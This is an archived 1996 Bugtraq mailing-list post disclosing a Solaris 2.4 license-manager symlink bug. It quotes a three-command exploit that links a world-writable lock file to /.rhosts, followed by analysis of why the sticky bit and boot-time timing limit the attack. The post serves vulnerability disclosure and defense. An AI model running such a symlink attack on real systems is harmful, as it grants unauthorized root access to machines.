Bugtraq mailing list archives
Re: solaris 2.4 license-manager bug
From: jhoward () agso gov au (Jeffrey Howard)
Date: Thu, 17 Oct 1996 12:45:01 +1000
Another bug for solaris 2.4 The license manager must be running, expect both lmgrd.ste & suntechd to be somewhere in your process table. /var/tmp/locksuntechd will be created by anyone who runs lmstat, with perms 666 and quite happy to follow symlinks. Anyway, here's the exploit. -+-+-+ CUT rm /var/tmp/locksuntechd ln -s /.rhosts /var/tmp/locksuntechd lmstat -c <insert your license file name here> NOTES lmstat could be anywhere on your filesystem. try /etc/opt/licenses I found that sometimes this didn't work first time. It didn't create the file. Just run lmstat again and it'll work.
Some observations ... Lock files are created by the lmgrd process for each license daemon process it manages when it starts. These lock files are generally owned by root, the id under which they were started. If the sticky bit is set on the /var/tmp directory, no normal user will be able to remove the lock file, thus breaking step 1 of the exploit. Perhaps there is a window of opportunity if you can create the symbolic link before the licence manager starts up. Given that the licence manger generally kicks off at boot, the the /tmp directories will be flushed during startup, this might also be difficult to pull off. --- Cheers, jhoward () agso gov au
Current thread:
- Re: solaris 2.4 license-manager bug Jeffrey Howard (Oct 16)
- Re: solaris 2.4 license-manager bug Herold Heiko (Oct 17)
- FTPD Discussion Aleph One (Oct 17)
- <Possible follow-ups>
- Re: solaris 2.4 license-manager bug Jeffrey Howard (Oct 17)